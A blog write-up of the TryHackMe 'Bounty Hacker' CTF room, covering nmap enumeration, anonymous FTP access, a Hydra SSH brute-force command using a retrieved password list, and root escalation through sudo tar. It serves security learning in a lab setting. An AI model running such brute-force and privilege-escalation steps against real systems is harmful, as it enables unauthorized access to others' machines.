Open in app

Sign in

Write

Sign in

TryHackMe -Bounty Hacker

Software Sinner
5 min readMay 7, 2021

This is my 17th write up and I will be discussing my experience with the machine “Bounty Hacker” from TryHackMe. TryHackMe is a great platform for people who are starting out in the InfoSec field and want to sharpen their skills in networking, Linux, hacking, etc. The platform is very hands on with their training material and keeps it fun for learners. This challenge was super cool not only because it is one of my favorite anime’s but the way it was setup made it a great experience. For those of you wondering, the box was based off of a show called Cowboy Bebop an anime classic. FTP allowed anonymous access providing a password list for bruteforcing a users ssh account followed by allowing tar to be ran as “root”.

Ed is up to something here..

Step 1: Enumeration

I started off with an Nmap scan against this machine to see what ports/versions were exposed and decided there was no need for second scan type. It does not hurt to run two different types of Nmap scans because one scan may provide you more results than the other depending on the flags used plus its just good hygiene. The scan I kicked off used default scripts -sC and version detection -sV flags. If it is your first time learning about Nmap I would checkout HackerSploits YouTube tutorials.

sinner@kali:~/Documents/tryhackme/bountyhacker$ nmap -sC -sV  10.10.27.252
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 22:00 EDT
Nmap scan report for 10.10.27.252
Host is up (0.21s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT                                                                                       
| ftp-syst:                                                                                                                  
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.2.79.120
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.79 seconds

Reading the results I start from top to bottom usually, but port 80 always screams at me to visit there first. I was welcomed with the cowboy bebop crew :)

Ran directory busting tools and did not find anything of interest so I moved on to the next port in my list which was port 21 for FTP. From looking at the nmap scan results you can see it is allowing anonymous logins without a password 😮. Opening my terminal I ran the ftp command followed by the machines IP and entered the username “anonymous” and hit enter.

I found two interesting files by running the dir command and proceeded with pulling them onto my machine to view the contents. FTP does not allow to view contents from the terminal.

mget * will grab all the files in the current directory

I ran around in circles at first because when I tried to grab these files it gave me a “permission denied”. I learned that running the “ftp” command as root will fix this. Upon viewing the files on my machine I opened of task.txt first and noticed an interesting note written by lin hmm..

The next file locks.txt had a whole list of passwords, these were definitely not in username format. This lead me to a possible bruteforce on then only open port service left which was ssh on port 22. There was no other form of login pages or services presented so this was my only option it seemed. We needed some usernames to try out so I compiled some based off of the cowboy bebop web page with the crews names in addition to lin from that note we saw. Fired up Hydra for this ssh bruteforce attack with the following command:

sudo hydra -vV -L bebop_users.txt -P locks.txt 10.10.27.252 -t 4 ssh

Sure enough, we got a hit ladies and gentleman..

Now I was able to connect to the users account via ssh with the password. You should never allow password authentications via ssh and if you do at least put a password lockout policy to prevent bruteforce attacks.

First thing I do when having a low privilege account is run sudo -l and sure enough we see here that I can run the tar command as root. Another mistake I made was thinking that I needed the root password to run sudo -l but I was wrong. I just needed to use lin’s password, so this drove me crazy for a while.. I did some googling on how to escalate privilege's using the tar command and found the following:

sudo -l output

tar | GTFOBins

It can be used to break out from restricted environments by spawning an interactive system shell. tar -cf /dev/null…

gtfobins.github.io

command to escalate with tar

Root is mine!

Infosec
Cybersecurity
Hacking
Ctf Writeup
Tryhackme

--

--

Software Sinner

Written by Software Sinner

81 Followers

Penetration Tester 🦇 | https://github.com/SoftwareSinner

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams